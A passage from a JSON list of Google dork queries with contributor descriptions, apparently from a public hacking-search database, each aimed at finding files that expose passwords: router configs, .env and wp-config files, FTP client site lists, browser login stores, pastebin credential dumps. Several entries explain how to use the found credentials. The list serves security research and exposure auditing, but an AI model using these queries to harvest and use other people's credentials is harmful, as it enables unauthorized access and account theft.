but the default username and password is 'WebAdmin:WebBoard' without the quotes. This is my first Googledork entry, so be gentle :)Funny enough, many of the DES hashes seem to use a salt of \"ae\". I tried just using this string along with the inurl portion, but it seemed to inappropriately restrict the search. Couple this with [3] and, um, yeah.cykyc[1]http://www.scriptarchive.com/wwwboard.html[2]http://www.scriptarchive.com/faq/wwwboard.html#q2[3]http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=625"}, {"dork": "intext:\"powered by EZGuestbook\"", "description": "HTMLJunction EZGuestbook is prone to a database disclosure vulnerability. Remote users may download the database http://www.securityfocus.com/bid/13543/info/"}, {"dork": "inurl:perform.ini filetype:ini", "description": "mIRC Passwords For Nicks & Channels in channel\\[chanfolder] section of mirc.ini you can find 2 type of \"private\" information - secret channels (that is +ps is not listed everythere) and password protected channels - passwords stored in plaintext)"}, {"dork": "filetype:dat inurl:pass.dat", "description": "Accesses passwords mostly in cgibin but not all the timeCan find passwords + usernames (sometimes username), some unecrypted some not"}, {"dork": "inurl:cgi-bin inurl:calendar.cfg", "description": "CGI Calendar (Perl) configuration file reveals information including passwords for the program."}, {"dork": "[WFClient] Password= filetype:ica", "description": "The WinFrame-Client infos needed by users to connect toCitrix Application Servers (e.g. Metaframe).Often linked/stored on Webservers and sometimes reachable from Internet.Password is 16-byte-Hash of unknown encryption (MSCHAPv2 ?).File Extension is \"ica\" the so called Citrix\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae Independent Computing Architecture.These files may contain login information (Username, Password, Domain)."}, {"dork": "filetype:dat inurl:Sites.dat", "description": "If you want to find out FTP passwords from FlashFXP Client, just type this query in google and you'll find files called Sites.dat which contain ftp sites, usernames and passwords. If you want to use it, just install FlashFXP and copy whole section to your sites.dat file (file is in your flashFXP directory)."}, {"dork": "intext:\"enable password 7\"", "description": "some people are that stupid to keep their Cisco routers config files on site. You can easly find out configs and password alog with IP addresses of this devices. Above string let you find weak passwords, which are encrypted but can be decrypted by free tool called GetPass and provided by boson.com"}, {"dork": "\"your password is\" filetype:log", "description": "This search finds log files containing the phrase (Your password is). These files often contain plaintext passwords, although YMMV."}, {"dork": "\"admin account info\" filetype:log", "description": "searches for logs containing admin server account information such as username and password."}, {"dork": "inurl:/yabb/Members/Admin.dat", "description": "This search will show you the Administrator password (very first line) on YaBB forums whose owners didnt configure the permissions correctly. Go up a directory to get a full memberlist (the .dat files have the passwords)."}, {"dork": "inurl:\"Sites.dat\"+\"PASS=\"", "description": "FlashFXP has the ability to import a Sites.dat file into its current Sites.dat file, using this search query you are able to find websites misconfigured to share the flashfxp folder and subsequently the Sites.dat file containing all custom sites the victim has in their sitelist. the passwords are not clear text but if you import the sites.dat into flashfxp you can connect to the ftps and it automatically sends the password. you can also set flashfxp to not hide passwords and it will show you what the password is when it connects."}, {"dork": "ext:yml database inurl:config", "description": "Ruby on Rails is a MVC full-stack framework for development of web applications. There's a configuration file in this framework called database.yml that links the Rails with the DB. It contains all the info needed to access de DB including username and password in clear text."}, {"dork": "\"parent directory\" +proftpdpasswd", "description": "User names and password hashes from web server backups generated by cpanel for ProFTPd. Password hashes can be cracked, granting direct access to FTP accounts. Unix passwd and shadow files can sometimes be found with this query as well."}, {"dork": "inurl:ventrilo_srv.ini adminpassword", "description": "This search reveals the ventrilo (voice communication program used by many online gamers) passwords for many servers. Possiblity of gaining control of the entire server."}, {"dork": "filetype:bak createobject sa", "description": "This query searches for files that have been renamed to a .bak extension (obviously), but includes a search for the characters \"sa\" (default SQL server admin id) and \"createobject\" which is requisite VBScript for opening some sort of odbc/ado connection. Since the sql id and password are plain text, it's easy to connect to the SQL server once you have this information... especially those that use \"server=127.0.0.1\" so you know IIS & SQL Server are running on the same box."}, {"dork": "inurl:\"editor/list.asp\" | inurl:\"database_editor.asp\" | inurl:\"login.asa\" \"are set\"", "description": "This search finds CLEARTEXT usernames/passwords for the Results Database Editor. The log in portal can be found at /editor/login.asp. At time of submitting there are 21 results.Also a search for the logins:inurl:\"Results/editor/login.asp\"\"Database Editor Login\" \"Results Page\""}, {"dork": "ext:passwd -intext:the -sample -example", "description": "Various encrypted passwords, some plaintext passwords and some private keys are revealed by this search."}, {"dork": "enable password | secret \"current configuration\" -intext:the", "description": "Another Cisco configuration search. This one is cleaner, gives complete configuration files and it catches plaintext, \"secret 5\" and \"password 7\" passwords."}, {"dork": "filetype:reg reg +intext:\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u201a\u00c2\u009dWINVNC3\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u201a\u00c2\u009d", "description": "This can be used to get encoded vnc passwords which can otherwise be obtained by a local registry and decoded by cain & abel. The query find registry entries which can otherwise be found can locally in:\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\PasswordIf you are a cain and abel user you'll and have used this feature before you will know how useful this query is. Other than decoded passwords you can also find other useful information on the VNC server and its security. I have successfully gained access to many VNC servers."}, {"dork": "\"login: *\" \"password= *\" filetype:xls", "description": "This returns xls files containing login names and passwords. it works by showing all the xls files with password:(something)so a downside is that u do get stuff like \"password protected\", \"password services\" etc. (and the same for login)But...most of the decent ones have the login and password in the text given to you by google, so its easy to seperate the useful ones from the others."}, {"dork": "inurl:-cfg intext:\"enable password\"", "description": "Google search for Cisco config files (some variants below):\ninurl:router-confg\ninurl:-confg intext:enable password\ninurl:-config intext:\"enable password\"\ninurl:-cfg intext:\"enable secret\"\ninurl:-confg intext:enable secret\ninurl:-confg intext:\"enable secret\" \nAuthor: fdisk"}, {"dork": "inurl:web/frontend_dev.php -trunk", "description": "Google search for web site build with symfony framework and in\ndevelopment environment.\nIn most case, you have a bar development on top of the web page. If you\ngo in config -> Settings, you can find login and password.\nif you replace web/frontend_dev.php by config/databases.yml in url, you\ncan find login / password for the databases\nAuthor: Simon Leblanc"}, {"dork": "inurl:ftp \"password\" filetype:xls", "description": "this string may be used to find many low hanging fruit on FTP sites recently indexed by google. Author: Uhaba"}, {"dork": "filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)", "description": "Backup or temp versions of php files containing you guessed it passwords or\nother ripe for the picking info...\nAuthor: Bastich"}, {"dork": "\"My RoboForm Data\" \"index of\"", "description": "This dork looks for Roboform password files. Author: Robert McCurdy"}, {"dork": "ext:xml (\"mode_passive\"|\"mode_default\")", "description": "OffSec:\nSo the dork is:\next:xml (\"mode_passive\"|\"mode_default\")\nThis dork finds Filezilla XML files.\ufffd To be more specific;\n\ufffd\ufffd\ufffd recentservers.xml\n\ufffd\ufffd\ufffd sitemanager.xml\n\ufffd\ufffd\ufffd filezilla.xml\nThese files contain clear text usernames and passwords.\ufffd They also contain the hostname or IP to connect to as well as the port.\ufffd Most of these results will be for FTP however, you can also get port 22 to SSH in.\ufffd This dork of course can be modified to target a specific website by appending site:whateversite.com.\ufffd You can also look for a specific username like root by appending \"root\" to the dork.\ufffd\ufffd\nRegards,\nnecrodamus\nhttp://www.twitter.com/necrodamus2600\nhttp://www.photobucket.com/profile/necrodamus2600"}, {"dork": "filetype:xls \"username | password\"", "description": "filetype:xls \"username | password\" This search reveals usernames and/or passwords of the xls documents.\nby Stakewinner00"}, {"dork": "\"parent directory\" proftpdpasswd intitle:\"index of\" -google", "description": "This dork is based on this: https://www.exploit-db.com/ghdb/1212/\n but improved cause that is useless, instead of this:\n \"parent directory\" proftpdpasswd intitle:\"index of\" -google\n Best regards,\n Nemesis"}, {"dork": "inurl:\"/dbman/default.pass\"", "description": "A path to a DES encrypted password for DBMan (\r\n\r\nhttp://www.gossamer-threads.com/products/archive.html) ranging from Guest\r\n\r\nto Admin account, this is often found coupled with cgi-telnet.pl (\r\n\r\nhttp://www.rohitab.com/cgi-telnet) which provides an admin login, by\r\n\r\ndefault and the password provided by DBMan's path /dbman/default.pass\r\n\r\n\r\n\r\n\r\n\r\nI have already posted this to packetstorm on June 7th 2004, called\r\n\r\ncgitelnetdbman (\r\n\r\nhttp://packetstormsecurity.org/files/29530/cgitelnetdbman.pdf.html)\r\n\r\n\r\n\r\nThe 'Dork' is *inurl:\"/dbman/default.pass\" *\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nLawrence Lavigne (ratdance)\r\n\r\n-suidrewt"}, {"dork": "allinurl:\"User_info/auth_user_file.txt\"", "description": "Google dork for find user info and configuration password of DCForum\nallinurl:\"User_info/auth_user_file.txt\"\n- Ajith Kp"}, {"dork": "ext:xml (\"proto='prpl-'\" | \"prpl-yahoo\" | \"prpl-silc\" | \"prpl-icq\")", "description": "*Google Search:*\nhttps://www.google.com/search?q=ext:xml%20(%22proto='prpl-'%22%20|%20%22prpl-yahoo%22%20|%20%22prpl-silc%22%20|%20%22prpl-icq%22) \n*Description:*\nFind Accounds and Passwords from Pidgin Users.\nGoogle limit queries to 32 words so it?s impossible to search for all \nAccount-Types in one query!\nList of all Params: Feel free to build your own search query.\nproto='prpl-'; prpl-silc; prpl-simple; prpl-zephyr; prpl-bonjour; \nprpl-qq; prpl-meanwhile; prpl-novell; prpl-gg; prpl-myspace; prpl-msn; \nprpl-gtalk; prpl-icq; prpl-aim; prpl-yahoo; prpl-yahoojp; prpl-yah; \nprpl-irc; prpl-yabber\n*Author:* la.usch.io"}, {"dork": "filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect", "description": "Aggregates previous mysql_(p)connect google dorks and adds a new filetype.\nSearches common file extensions used as backups by PHP developers. These\nextensions are normally not interpreted as code by their server, so their\ndatabase connection credentials can be viewed in plaintext.\n- Andy G - twitter.com/vxhex"}, {"dork": "filetype:config inurl:web.config inurl:ftp", "description": "This google dork to find sensitive information of MySqlServer , \"uid, and\npassword\" in web.config through ftp..\nfiletype:config inurl:web.config inurl:ftp\n-Altamimi"}, {"dork": "ext:sql intext:@hotmail.com intext :password", "description": "By ,\nNItish Mehta ,\nIlluminative Works(CEO & Founder )"}, {"dork": "filetype:sql insite:pass && user", "description": "Google Dork: filetype:sql insite:pass && user\nWe Can get login username and password details from .sql file.\nAuthor: BlacK_WooD"}, {"dork": "site:github.com inurl:sftp-config.json intext:/wp-content/", "description": "Finds disclosed ftp FTP for Wordpress installs, which have been pushed to a public repo on GitHub.\nCredit: RogueCoder"}, {"dork": "site:github.com inurl:sftp-config.json", "description": "Find disclosed FTP login credentials in github repositories\nCredit: RogueCoder"}, {"dork": "filetype:password jmxremote", "description": "Passwords for Java Management Extensions (JMX Remote)\nUsed by jconsole, Eclipse's MAT, Java Visual VM, JmxCli\nhttp://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:/backup intitle:index of backup intext:*sql", "description": "Google Search:https://www.google.com/search?client=opera&q=admin+username+and+pass&sourceid=opera&ie=UTF-8&oe=UTF-8#q=inurl:/backup+intitle:index+of+backup+intext:*sql&start=70\n1)Find the Back Up\n2)Downlod it\n3)Import it into phpmyadmin\n4)Find the admin username and password :)\nDork submitted by The Vi9er\nGood Luck"}, {"dork": "inurl:yahoo_site_admin/credentials/", "description": "# Exploit Title: [Yahoo Hosting db-credentials]\n# Google Dork: [inurl:yahoo_site_admin/credentials/]\n# Date: [29/11/2014]\n# Exploit Author: [Mohammad Shahein]\n# Vendor Homepage: [www.boxeffect.com ]\n# Tested on: Win7 ,Google Chrome Version 39.0.2171.71 m]\nGoogle the dork it will allow you to download db.conf the file will contain\nthe following info\n mysql\n [ database name ]\n [ database user name ]\n [ database password ]\n*Mohammad Shaheen*\nsenior Programer, BoxEffect\nwebsite: www.boxeffect.com"}, {"dork": "inurl:\"security/xamppdirpasswd.txt\"", "description": "This dork shows the plain text password saved in a XAMPP installation when\nthe administrator configures \"Security Console MySQL & XAMPP directory\nprotection\":\ninurl:\"security/xamppdirpasswd.txt\"\nAuthor: @felmoltor\n-- \nFelipe Molina de la Torre"}, {"dork": "ext:sql intext:\"alter user\" intext:\"identified by\"", "description": "This dork will show files containing SQL instructions where the\nadministrator set a password for a database user.\nAuthor: @felmoltor"}, {"dork": "ext:csv intext:\"password\"", "description": "This dork finds csv files containing passwords and other juicy information.\nAuthor:NickiK."}, {"dork": "intext:DB_PASSWORD ext:env", "description": "This dork finds env files, usually used in Laravel configuration, \ncontaining passwords and other juicy information.\nAuthor: Augusto Pereira"}, {"dork": "site:pastebin.com intext:Username", "description": "# Exploit Title: [site:pastebin.com intext:Username]\n# Google Dork: [Pastebin Username & Password]\n# Date: [6/29/2015]\n# Exploit Author: [Daz Holmes]"}, {"dork": "intext:@pwcache \"parent directory\"", "description": "intext:@pwcache \"parent directory\"\nBest regards,\nAdam Bedard"}, {"dork": "filetype:log intext:password | pass | pw", "description": "http://www.google.com/search?q=filetype:log intext:password | pass | pw\nLog files containing passwords...\nDecoy"}, {"dork": "inurl:etc -intext:etc ext:passwd", "description": "Files with a lot of passwords. Enjoy healthy!.\nDork by Rootkit Pentester."}, {"dork": "ext:sql intext:username intext:password", "description": "search turns up database files with cleartext and encryption, often leading\nto open directory structures and configuration files."}, {"dork": "inurl:wp-config -intext:wp-config \"'DB_PASSWORD'\"", "description": "I give this Dork for Wordpress Passwords. I hope you enjoy with this!.\nDork: inurl:wp-config -intext:wp-config \"'DB_PASSWORD'\"\nBest Regards Rookit Pentester."}, {"dork": "intext:\"END_FILE\" ext:log", "description": "Description: Files containing passwords\nGoogle search: intext:\"END_FILE\" ext:log\nAuthor: nebo_oben"}, {"dork": "site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491", "description": "# Exploit Title: [Files Containing E-mail and Associated Password Lists]\n# Google Dork: [site:pastebin.com intext:@gmail.com | @yahoo.com | \n@hotmail.com daterange:2457388-2457491 (adjust daterange as required)]\n# Date: [04/13/2016]\n# Exploit Author: [Stephanie Jensen]\n# Contact: [https://twitter.com/Steph_J_]\n# Website: [http://www.scriptkittysecurity.com]\n1.Description\nThis dork searches for all files within pastebin.com containing email \naddresses associated with yahoo, gmail or hotmail accounts. Due to the \nculture of pastebin.com most entries contain associated passwords for \nthese email addresses. Setting a relatively recent daterange query \nterm allows for recent files to be displayed.\nsite:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com \ndaterange:2457388-2457491 (date range can be changed for recent \nlisting of files - must use julian dates)"}, {"dork": "intext:\"eav\" filetype:txt", "description": "Files containing usernames & passwords of NOD32 antivirus accounts. \nGoogle dork:\nintext:\"eav\" filetype:txt\nThanks!\nD0bby"}, {"dork": "site:static.ow.ly/docs/ intext:@gmail.com | Password", "description": "This dork results in documents containing passwords that are stuck in ow.ly\ncache.\nMajority are from 2016 and are still working.\nDiscovered by @BLM_KRS (Twitter)"}, {"dork": "inurl:\"/wp-content/wpclone-temp/wpclone_backup/\"", "description": "Author: Charley Celice (@charleycelice)\nThis dorks often results in backed-up \"database.sql\" files, which contain\nWordPress usernames and passwords.\n-stmerry"}, {"dork": "inurl:proftpdpasswd", "description": "Dork of proftpd passwords!.\nHave Fun!.\nDork by Rootkit Pentester."}, {"dork": "inurl:github.com intitle:config intext:\"/msg nickserv identify\"", "description": "Github irc raw password:\r\n\r\n\r\n\r\ninurl:github.com intitle:config intext:\"/msg nickserv identify\"\r\n\r\n\r\n\r\n- al4r0"}, {"dork": "intitle:\"index of/\" CCCam.cfg", "description": "intitle:\"index of/\" CCCam.cfg\nConfig file contains User and Passwords of CCCam Servers.\nGuillermo Gaz\u00f3n\nInnotec System - Security Researchs"}, {"dork": "site:cloudshark.org/captures# password", "description": "Dork: site:cloudshark.org/captures# password\nPCAP captures containing passwords\nMr. Cheshire\nSee also: http://www.elladodelmal.com/2017/02/cloudshark-tus-credenciales-en-las.html"}, {"dork": "\"your default password is\" filetype:pdf", "description": "\"your default password is\" filetype:pdf\n*Richard De Vere*\n*Principal Consultant*\n*Web:* TheAntiSocialEngineer.com\n*Twitter:* @AntiSocial_Eng"}, {"dork": "\"Index of\" \"logins.json\" \"key3.db\"", "description": "Finds directories containing saved Firefox passwords, browsing history, and\r\n\r\nmore.\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"-wp13.txt\"", "description": "Finds config files for MySQL, ABSPATH, Wordpress, and more!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "filetype:bak inurl:php \"mysql_connect\"", "description": "PHP backups that contain MySQL database passwords.\r\n\r\n\r\n\r\nfiletype:bak inurl:php \"mysql_connect\""}, {"dork": "\"[main]\" \"enc_GroupPwd=\" ext:txt", "description": "Finds Cisco VPN client passwords (encrypted, but easily cracked!)\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "ext:fetchmailrc", "description": "Finds .fetchmailrc files with eMail login info\nDxtroyer"}, {"dork": "\"FileZilla\" inurl:\"recentservers.xml\" -git", "description": "Finds FileZilla recent server files with plain text usernames/passwords\nDxtroyer"}, {"dork": "\" End Stealer \" ext:txt", "description": "Finds logs from \"Black Stealer\", an internet password stealer\nDxtroyer"}, {"dork": "\"iSpy Keylogger\" \"Passwords Log\" ext:txt", "description": "Description: iSpy keylogger logs\nDork: \"iSpy Keylogger\" \"Passwords Log\" ext:txt\nAuthor: scumsec"}, {"dork": "\"mysqli_connect\" ext:inc", "description": "Finds scripts containing MySQL usernames and passwords\nDxtroyer"}, {"dork": "inurl:\"gradle.properties\" intext:\"proxyPassword\"", "description": "Google Dork: Files Containing Passwords\r\n\r\nExploit Author: Huijun Chen"}, {"dork": "site:trello.com password", "description": "This will bring public Trello boards often containing user names and passwords. You can guess the context from the other cards published or fine-tune the query to probe boards you're interested in."}, {"dork": "\"enable secret\" ext:cfg -git -cisco.com", "description": "Finds files containing Cisco NAC hostnames and passwords in plaintext\r\n\r\nDxtroyer\r\n\r\nP.S. Some honeypots too, sorry :P"}, {"dork": "ext:inf SetupMgrTag AdminPassword", "description": "Google Dork: Files Containing Passwords\r\nFinds admin password from windows install config files.\r\n\r\nHuijun Chen"}, {"dork": "\"password\" + ext:conf \"Modem Type = USB Modem\"", "description": "Google Dork: Files Containing Passwords\r\n\r\nHuijun Chen"}, {"dork": "ext:config + \" password=\" + \"", "description": "Google Dork: Files Containing Passwords\r\n\r\nHuijun Chen"}, {"dork": "intitle:\"Index Of\" intext:sftp-config.json", "description": "Description :\r\nThis dork returns list of FTP/SFTP passwords from sublime text.\r\n\r\nDork :\r\nintitle:\"Index Of\" intext:sftp-config.json\r\n\r\nAuthor :\r\nVipin Joshi ( @vocuzi )"}, {"dork": "\"MAIL_PASSWORD\" filetype:env", "description": "*Google* dork *description: *mail credentials ( db credentials) for mostly\r\nlaravel websites\r\n\r\n*Google Search:* \"MAIL_PASSWORD\" filetype:env\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "\"database_password\" filetype:yml \"config/parameters.yml\"", "description": "*Google dork description: *database credentials for mostly symfony apps\r\n\r\n*Google Search:* \"database_password\" filetype:yml \"config/parameters.yml\"\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "\"database_password\" filetype:yml \"config/parameters.yml", "description": "Database credentials for mostly CakePHP apps\r\n\r\ndatabase_password\" filetype:yml \"config/parameters.yml\"\r\n\r\nThanks\r\nArya Usha"}, {"dork": "intext:password inurl:\"/log/production\" ext:log", "description": "Rails web application Framework stores passwords and tokens in plain text i\r\nthe log.\r\n\r\n\r\nBruno Schmid"}, {"dork": "CakePHP inurl:database.php intext:db_password", "description": "Contains database username and password along with dbname.\r\n\r\nThanks\r\nKiran S"}, {"dork": "intitle:\"index of /\" inanchor:.kdbx", "description": "This will find KeePass databse files in open web directories, to download\r\nand potentionally bruteforce.Use responsible and ethical!\r\n\r\nDork by _palone"}, {"dork": "site:pastebin.com \"rcon_password\"", "description": "Finding rcon_ passwords to source engine based game servers on pastebin.\r\nThis allows you to execute server side commands, it is kinda like an admin\r\npassword.\r\n\r\nUse ethically and responsibly.\r\nDork by _palonE"}, {"dork": "intitle:\"Index Of\" intext:\".vscode\"", "description": "Description :\r\nMicrosoft Visual Code Editor files containing passwords and config\r\ninformation.\r\n\r\nDork :\r\nintitle:\"Index Of\" intext:\".vscode\"\r\n\r\nAuthor:\r\nVipin Joshi (@vocuzi)"}, {"dork": "inurl:/host.txt + filetype:txt + \"password\"", "description": "inurl:/host.txt + filetype:txt + \"password\"\r\n\r\nFile containing passwords\r\n\r\nManhNho"}, {"dork": "inurl:\"config.xml\" \"password\" ext:xml -stackoverflow.com -github.com", "description": "Several XML config files containing passwords and other interesting info\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"databases.yml\" ext:yml password -github", "description": "Symfony databases passwords.\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"index.of\" \"places.sqlite\" \"key3.db\" -mozilla.org", "description": "This dork finds Mozilla Firefox stored passwords, bookmarks, history and \r\nmany other information. It leads you to the \".default\" \r\nfolder where Firefox stores all the user data.\r\n\r\nAlso try:\r\nintitle:\"index.of\" \"permissions.sqlite\" \"cookies.sqlite\" -mozilla.org\r\n\r\n\r\nThe passwords are stored in two different files, both of which are required:\r\n\r\n key3.dbkey4.db (or key3.db, or key4.db) - This file stores the key \r\ndatabase for the user's passwords. To transfer saved passwords, you must \r\ncopy this file along with the logins.json which have the saved passwords.\r\n\r\nOther files are:\r\n\r\nBookmarks, Downloads and Browsing History -> places.sqlite\r\n\r\n\r\nSite-specific preferences -> permissions.sqlite\r\n\r\n\r\nSearch engines -> search.json.mozlz4\r\n\r\n\r\nPersonal dictionary -> persdict.dat\r\n\r\n\r\nAutocomplete history -> formhistory.sqlite\r\n\r\n\r\nCookies -> cookies.sqlite\r\n\r\n\r\nSecurity certificate settings -> cert8.dbcert9.db\r\n\r\n\r\nFile types and download actions -> mimeTypes.rdfhandlers.json\r\n\r\n\r\n\r\n\r\nBruno Schmid\r\n||\r\n|\r\n|https://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index.of\" \"places.sqlite\" \"Mail\" thunderbird -mozilla.org -scan", "description": "Dork containing Thunderbird directories with very Juicy info and passwords\r\n\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:config \"\" \"password\" \"web.config\" -stackoverflow -youtube.com -github", "description": "Passwords which are stored in the ASP.NET Web.config file which is also \r\nan XML file. This file is mostly used for Authentication, Authorization, \r\nMembership Provider, Role Provider and Profile Provider Settings. Other \r\njuicy info shall be in the file as well.\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://www.linkedin.com/in/schmidbruno"}, {"dork": "ext:ini Robust.ini filetype:ini \"password\"", "description": "Robust server configuration files containing passwords\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "Codeigniter filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values", "description": "This dork allow you to specific find file contains Username,\r\nPassword, Secret Keys and allows you to search for sql configuration file.\r\n\r\nArya Usha"}, {"dork": "inurl:\"servlet/ViewFormServlet?\" \"pwd\"", "description": "BMC Remedy Mid Tier gives username and password in the url.\r\nSome commands are also possible, like password reset and so on.\r\n\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"Index of\" intext:\"Login Data\"", "description": "Description :\r\nGoogle Chrome saved login credentials SQLite files.\r\n\r\nDork :\r\nintitle:\"Index of\" intext:\"Login Data\"\r\n\r\nAuthor:\r\nVipin Joshi (@vocuzi)"}, {"dork": "inurl:\"/App.Config\" + ext:config + \"password=\" -github -git", "description": "inurl:\"/App.Config\" + ext:config + \"password=\" -github -git\r\n\r\nFile containing passwords\r\n\r\nManhNho"}, {"dork": "intext:\"PuTTY log\" ext:log \"password\" -supportforums -github", "description": "intext:\"PuTTY log\" ext:log \"password\" -supportforums -github\r\n\r\nFile containing passwords\r\n\r\nManhNho"}, {"dork": "filetype:doc inurl:\"gov\" intext:\"default password is\"", "description": "Pages from gov domain with default passwords assigned in their systems.\r\nAlso try \"pdf\" and \"txt\" in the file type.\r\n\r\nSome of the default passwords being used are P4ssw0rd, #P@ssw0rd2013,\r\nshadow, 39pL4q, WELCOME1, master.\r\n\r\nVaibhav Dhote"}, {"dork": "site:trello.com intext:mysql AND intext:password -site:developers.trello.com -site:help.trello.com", "description": "Public Trello Boards with Juicy Stuff\r\n\r\nsite:trello.com intext:mysql AND intext:password -site:developers.trello.com\r\n-site:help.trello.com\r\n\r\nDec0y"}, {"dork": "site:showmyhomework.co.uk/school/homeworks/ \"password\"", "description": "Shows educational site passwords left for students, meant to be accessed\r\nvia login portal\r\n\r\nFound by @LewisBugBounty / fifteen@riseup.net"}, {"dork": "intitle:\"index.of\" inurl:\"cvs\" login | passwd | password | access | pass -github -pub", "description": "Files and directories containing passwords and other juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:env intext:REDIS_PASSWORD", "description": ".env files with password and username in plain-text of Redis, used in\r\nLaravel and other web apps\r\n\r\nOther:\r\nfiletype:env intext:APP_KEY=\r\n\r\nAmal Jossy"}, {"dork": "\"password.xlsx\" ext:xlsx", "description": "\"password.xlsx\" ext:xlsx\r\n\r\nexcel files containing password\r\n\r\nManhNho"}, {"dork": "inurl:wp-config-backup.txt", "description": "inurl:wp-config-backup.txt\r\nYou can see user and pass database\r\n\r\nmaxbomb"}, {"dork": "intext:define('AUTH_KEY', ' wp-config.php filetype:txt", "description": "WordPress config files\r\n\r\nMattias Borg"}, {"dork": "inurl:/dbcp.properties + filetype:properties -github.com", "description": "inurl:/dbcp.properties + filetype:properties -github.com\r\n\r\nfile containing password\r\n\r\nManhNho"}, {"dork": "inurl:configuration.php and intext:\"var $password=\"", "description": "Dork: *inurl:configuration.php and intext:\"var $password=\" *\r\n\r\nA Google dork that gives\r\nthe information about target database. Containing username and password in\r\nplain text. \r\n\r\nDork discovered by: Sachin Wagh (@tiger_tigerboy)"}, {"dork": "intext:\"please change your\" password |code | login file:pdf | doc | txt | docx -github", "description": "Passwords\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"login\" department | admin | manager | company | host filetype:xls | xlsx -community -github", "description": "Some spreadsheet containing passwords\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"rabbit_password\" | \"service_password\" filetype:conf", "description": "Passwords in openstack setups.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"whoops! there was an error.\" \"db_password\"", "description": "Dork with lots of passwords!.\r\n\r\n\r\nDork discover by Rootkit Pentester."}, {"dork": "inurl:wp-config.bak", "description": "inurl:wp-config.bak\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nWordpress setup information.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "\"battlefield\" \"email\" site:pastebin.com", "description": "Hacked EA/Origin passwords"}, {"dork": "inurl:\"wp-license.php?file=../..//wp-config\"", "description": "inurl:\"wp-license.php?file=../..//wp-config\"\r\n\r\nFile contain password and directory traversal vulnerability\r\n\r\nManhNho"}, {"dork": "inurl:\"trello.com\" and intext:\"username\" and intext:\"password\"", "description": "Looking for the Username & Password from the public Trello board\r\n\r\nSang Bui"}, {"dork": "intitle:\"index of\" intext:login.csv", "description": "intitle:\"index of\" intext:login.csv\r\n\r\n\r\nThis Google Dork discovers servers with open directories exposing login \r\ninformation files.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "inurl:\"build.xml\" intext:\"tomcat.manager.password\"", "description": "Google Dork: Files Containing Passwords\r\ninurl:\"build.xml\" intext:\"tomcat.manager.password\" \r\nAuthor: Xin Min\r\nThis dork allows you to search for password of tomcat manager."}, {"dork": "/_wpeprivate/config.json", "description": "file containing password ;)\r\n\r\nManhNho"}, {"dork": "inurl:\"standalone.xml\" intext:\"password>\"", "description": "Google Dork: Files Containing Passwords\r\ninurl:\"standalone.xml\" intext:\"password>\"\r\nAuthor: Xin Min\r\nThis dork allows you to search for password of wildfly or jboss configuration."}, {"dork": "filetype:reg reg HKEY_CURRENT_USER intext:password", "description": "Get passwords from registry.\r\n\r\nYou can also use\r\n\r\nfiletype:reg reg HKEY_CURRENT_USER \r\n\r\nThis would be a good way to find out details about the target software in\r\nthe target machine.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:txt $9$ JunOS", "description": "filetype:txt $9$ JunOS\r\n\r\nDiscover Juniper Junos OS Hashes\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "intext:jdbc:oracle filetype:java", "description": "Find Oracle Database Credentials:\r\n\r\nintext:jdbc:oracle filetype:java\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "filetype:xml config.xml passwordHash Jenkins", "description": "Find Jenkins Password Hashes\r\n\r\n\r\nfiletype:xml config.xml passwordHash Jenkins\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "username | password inurl:resources/application.properties -github.com -gitlab", "description": "Credentials\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow", "description": "Description :\r\nDjango Web Framework email config plain-text Credentials.\r\n\r\nDork 